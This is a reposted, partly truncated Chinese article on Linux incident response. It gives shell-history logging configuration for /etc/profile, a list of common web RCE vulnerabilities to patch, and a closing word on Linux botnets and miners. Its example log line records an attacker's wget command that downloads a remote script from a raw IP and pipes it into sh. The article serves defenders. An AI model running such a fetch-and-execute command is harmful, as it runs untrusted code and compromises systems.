加入收藏 | 设为首页 | 会员中心 | 我要投稿 惠州站长网 (https://www.0752zz.com.cn/)- 办公协同、云通信、物联设备、操作系统、高性能计算!
当前位置: 首页 > 建站 > 正文

超全面的Linux应急响应技巧

发布时间:2019-11-12 18:06:54 所属栏目:建站 来源:深信服千里目安全实验室
导读:副标题#e# 概述 Linux环境下处理应急响应事件往往会更加的棘手,因为相比于Windows,Linux没有像Autorun、procexp这样的应急响应利器,也没有统一的应急响应处理流程。所以,这篇文章将会对Linux环境下的应急响应流程进行讲解,并且提供每一个环节中所用到

[2]在/etc/profile的文件尾部添加如下行数配置信息:

  1. USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'` 
  2. if [ "$USER_IP" = "" ] 
  3.  
  4. then 
  5.  
  6. USER_IP=`hostname` 
  7.  
  8. fi 
  9.  
  10. export HISTTIMEFORMAT="%F %T $USER_IP `whoami` " 
  11.  
  12. shopt -s histappend 
  13.  
  14. export PROMPT_COMMAND="history -a" 

[3]让配置生效:

  1. source /etc/profile 

生成效果:

  1. 762019-10-2817:05:34113.110.229.230 wget -q -T180 -O-<a href="http://103.219.112.66:8000/i.sh">http://103.219.112.66:8000/i.sh</a>) | sh 

打上常见Web漏洞补丁

  1. structs2系列RCE漏洞 
  2. thinkphp5.XRCE漏洞 
  3. Redis未授权访问漏洞 
  4. ConfluenceRCE漏洞(CVE_2019_3396) 
  5. DrupalRCE漏洞(CVE-2018-7600) 
  6. ThinkPHPRCE漏洞(CVE-2019-9082) 
结尾

Linux平台下的恶意软件威胁以僵尸网络蠕虫和挖矿病毒为主,由于Linux大多作为服务器暴露在公网,且Web应用的漏洞层出不穷,所以很容易被大范围入侵,如常见的病毒:DDG、systemdMiner、BillGates、watchdogs、XorDDos,在很多Linux上都有。大家要养成不使用弱密码、勤打补丁的好习惯。

【编辑推荐】

  1. 一些 Linux 系统故障修复和修复技巧
  2. 7件事,让你快速提高数据分析能力
  3. 官方爆料Deepin深度操作系统V20细节
  4. 中国信息协会信息安全专业委员会2019年年会暨首届中国数据安全和治理高峰论坛圆满落幕
  5. Linus TED 分享,Linux 背后的思想
【责任编辑:张燕妮 TEL:(010)68476606】
点赞 0

(编辑:惠州站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

推荐文章
    热点阅读